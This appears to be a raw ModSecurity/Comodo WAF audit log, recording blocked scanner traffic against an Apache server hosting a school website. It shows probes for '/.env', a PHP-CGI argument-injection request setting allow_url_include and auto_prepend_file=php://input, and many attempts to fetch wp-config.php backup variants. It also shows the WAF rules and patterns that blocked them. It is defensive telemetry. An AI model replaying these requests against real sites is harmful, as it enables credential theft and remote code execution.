X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.253.92.249 X-Forwarded-Proto: https Connection: close Content-Length: 28 content-type: application/dns-message accept: application/dns-message user-agent: Chrome --a6c58847-C-- â³googlecom --a6c58847-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6c58847-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1744925354939255 12852 (- - -) Stopwatch2: 1744925354939255 12852; combined=10877, p1=1749, p2=8657, p3=160, p4=257, p5=54, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6c58847-Z-- --0dc99d7e-A-- [18/Apr/2025:04:48:55 +0700] aAF3R1yj-eUTITfvHEUYmgAAABg 103.236.140.4 45710 103.236.140.4 8181 --0dc99d7e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 209.38.95.9 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 209.38.95.9 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --0dc99d7e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0dc99d7e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744926535257930 932 (- - -) Stopwatch2: 1744926535257930 932; combined=440, p1=400, p2=0, p3=0, p4=0, p5=40, sr=129, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0dc99d7e-Z-- --addd331d-A-- [18/Apr/2025:06:45:56 +0700] aAGStDpR4B6O-aqWibPN9QAAAIw 103.236.140.4 43172 103.236.140.4 8181 --addd331d-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 216.10.250.218 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 216.10.250.218 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --addd331d-C-- --addd331d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --addd331d-E-- --addd331d-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744933556156906 6614 (- - -) Stopwatch2: 1744933556156906 6614; combined=5022, p1=485, p2=4502, p3=0, p4=0, p5=35, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --addd331d-Z-- --e171c35c-A-- [18/Apr/2025:07:22:58 +0700] aAGbYjlhhbF_BYhFYTXhDAAAAEo 103.236.140.4 52328 103.236.140.4 8181 --e171c35c-B-- GET /wp-config.php_ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: */* --e171c35c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e171c35c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935778628850 834 (- - -) Stopwatch2: 1744935778628850 834; combined=302, p1=263, p2=0, p3=0, p4=0, p5=39, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e171c35c-Z-- --5e3bad27-A-- [18/Apr/2025:07:22:58 +0700] aAGbYjlhhbF_BYhFYTXhDQAAAEU 103.236.140.4 52330 103.236.140.4 8181 --5e3bad27-B-- GET /wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:41.0) Gecko/20100101 Firefox/41.0 Accept: */* --5e3bad27-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e3bad27-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935778661461 655 (- - -) Stopwatch2: 1744935778661461 655; combined=250, p1=218, p2=0, p3=0, p4=0, p5=32, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e3bad27-Z-- --bf0beb65-A-- [18/Apr/2025:07:22:58 +0700] aAGbYjlhhbF_BYhFYTXhDgAAAE0 103.236.140.4 52332 103.236.140.4 8181 --bf0beb65-B-- GET /wp-config.php~ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: */* --bf0beb65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bf0beb65-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935778693344 722 (- - -) Stopwatch2: 1744935778693344 722; combined=304, p1=273, p2=0, p3=0, p4=0, p5=31, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf0beb65-Z-- --5ff0341d-A-- [18/Apr/2025:07:22:58 +0700] aAGbYjlhhbF_BYhFYTXhDwAAAE8 103.236.140.4 52334 103.236.140.4 8181 --5ff0341d-B-- GET /wp-config.php.war HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.76 Safari/537.36 Accept: */* --5ff0341d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5ff0341d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935778729379 703 (- - -) Stopwatch2: 1744935778729379 703; combined=292, p1=261, p2=0, p3=0, p4=0, p5=31, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ff0341d-Z-- --47029344-A-- [18/Apr/2025:07:22:58 +0700] aAGbYlyj-eUTITfvHEUkBwAAAAc 103.236.140.4 52336 103.236.140.4 8181 --47029344-B-- GET /wp-config.php.tar HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.3; KFAPWI Build/KTU84M) AppleWebKit/537.36 (KHTML, like Gecko) Silk/44.1.81 like Chrome/44.0.2403.128 Safari/537.36 Accept: */* --47029344-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --47029344-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935778765035 728 (- - -) Stopwatch2: 1744935778765035 728; combined=301, p1=268, p2=0, p3=0, p4=0, p5=33, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47029344-Z-- --927bb068-A-- [18/Apr/2025:07:22:58 +0700] aAGbYjlhhbF_BYhFYTXhEAAAAFM 103.236.140.4 52338 103.236.140.4 8181 --927bb068-B-- GET /wp-config.php.saved HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/7.1.2 Safari/537.85.11 Accept: */* --927bb068-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --927bb068-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935778802788 667 (- - -) Stopwatch2: 1744935778802788 667; combined=247, p1=216, p2=0, p3=0, p4=0, p5=31, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --927bb068-Z-- --fa9e7608-A-- [18/Apr/2025:07:22:58 +0700] aAGbYhk6uTiIdxrJEES4jwAAAM4 103.236.140.4 52340 103.236.140.4 8181 --fa9e7608-B-- GET /wp-config.inc HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Accept: */* --fa9e7608-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa9e7608-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".inc"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744935778837759 2017 (- - -) Stopwatch2: 1744935778837759 2017; combined=793, p1=328, p2=439, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa9e7608-Z-- --22b4eb01-A-- [18/Apr/2025:07:22:58 +0700] aAGbYjpR4B6O-aqWibPQOwAAAJQ 103.236.140.4 52346 103.236.140.4 8181 --22b4eb01-B-- GET /wp-config.old HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 Accept: */* --22b4eb01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --22b4eb01-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.old" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935778876263 787 (- - -) Stopwatch2: 1744935778876263 787; combined=338, p1=303, p2=0, p3=0, p4=0, p5=35, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --22b4eb01-Z-- --5c0ccd3f-A-- [18/Apr/2025:07:22:58 +0700] aAGbYjlhhbF_BYhFYTXhEQAAAEk 103.236.140.4 52348 103.236.140.4 8181 --5c0ccd3f-B-- GET /wp-config.php.tmp HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Accept: */* --5c0ccd3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c0ccd3f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935778907492 853 (- - -) Stopwatch2: 1744935778907492 853; combined=384, p1=347, p2=0, p3=0, p4=0, p5=37, sr=131, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c0ccd3f-Z-- --56694960-A-- [18/Apr/2025:07:22:58 +0700] aAGbYjpR4B6O-aqWibPQPAAAAJA 103.236.140.4 52350 103.236.140.4 8181 --56694960-B-- GET /wp-config.php.bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: */* --56694960-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --56694960-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935778943730 642 (- - -) Stopwatch2: 1744935778943730 642; combined=252, p1=220, p2=0, p3=0, p4=0, p5=31, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --56694960-Z-- --872cae09-A-- [18/Apr/2025:07:22:58 +0700] aAGbYhk6uTiIdxrJEES4kAAAAM0 103.236.140.4 52352 103.236.140.4 8181 --872cae09-B-- GET /wp-config.php.save HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 Accept: */* --872cae09-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --872cae09-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935778974864 662 (- - -) Stopwatch2: 1744935778974864 662; combined=267, p1=221, p2=0, p3=0, p4=0, p5=46, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --872cae09-Z-- --f0a99838-A-- [18/Apr/2025:07:22:59 +0700] aAGbYzpR4B6O-aqWibPQPQAAAJc 103.236.140.4 52354 103.236.140.4 8181 --f0a99838-B-- GET /wp-config.php.orig HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H321 [FBAN/FBIOS;FBAV/38.0.0.6.79;FBBV/14316658;FBDV/iPad4,1;FBMD/iPad;FBSN/iPhone OS;FBSV/8.4.1;FBSS/2; FBCR/;FBID/tablet;FBLC/en_US;FBOP/1] Accept: */* --f0a99838-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f0a99838-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935779007164 666 (- - -) Stopwatch2: 1744935779007164 666; combined=268, p1=237, p2=0, p3=0, p4=0, p5=31, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0a99838-Z-- --35234c18-A-- [18/Apr/2025:07:22:59 +0700] aAGbYzlhhbF_BYhFYTXhEgAAAEs 103.236.140.4 52356 103.236.140.4 8181 --35234c18-B-- GET /wp-config.php.old HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E) Accept: */* --35234c18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --35234c18-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935779037585 652 (- - -) Stopwatch2: 1744935779037585 652; combined=252, p1=220, p2=0, p3=0, p4=0, p5=32, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --35234c18-Z-- --5063d87d-A-- [18/Apr/2025:07:22:59 +0700] aAGbYzpR4B6O-aqWibPQPgAAAII 103.236.140.4 52358 103.236.140.4 8181 --5063d87d-B-- GET /wp-config.php.original HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko Accept: */* --5063d87d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5063d87d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935779073123 663 (- - -) Stopwatch2: 1744935779073123 663; combined=268, p1=236, p2=0, p3=0, p4=0, p5=32, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5063d87d-Z-- --11537a71-A-- [18/Apr/2025:07:22:59 +0700] aAGbYzpR4B6O-aqWibPQPwAAAJY 103.236.140.4 52360 103.236.140.4 8181 --11537a71-B-- GET /wp-config.php.dist HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.18.US Safari/537.36 Accept: */* --11537a71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --11537a71-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935779105658 790 (- - -) Stopwatch2: 1744935779105658 790; combined=332, p1=297, p2=0, p3=0, p4=0, p5=35, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11537a71-Z-- --2232f32d-A-- [18/Apr/2025:07:22:59 +0700] aAGbYzpR4B6O-aqWibPQQAAAAI8 103.236.140.4 52362 103.236.140.4 8181 --2232f32d-B-- GET /wp-config.txt HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: */* --2232f32d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2232f32d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.txt" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935779137139 662 (- - -) Stopwatch2: 1744935779137139 662; combined=268, p1=236, p2=0, p3=0, p4=0, p5=32, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2232f32d-Z-- --1c1d8633-A-- [18/Apr/2025:07:22:59 +0700] aAGbYzpR4B6O-aqWibPQQQAAAJU 103.236.140.4 52364 103.236.140.4 8181 --1c1d8633-B-- GET /wp-config.php.txt HTTP/1.0 Host: 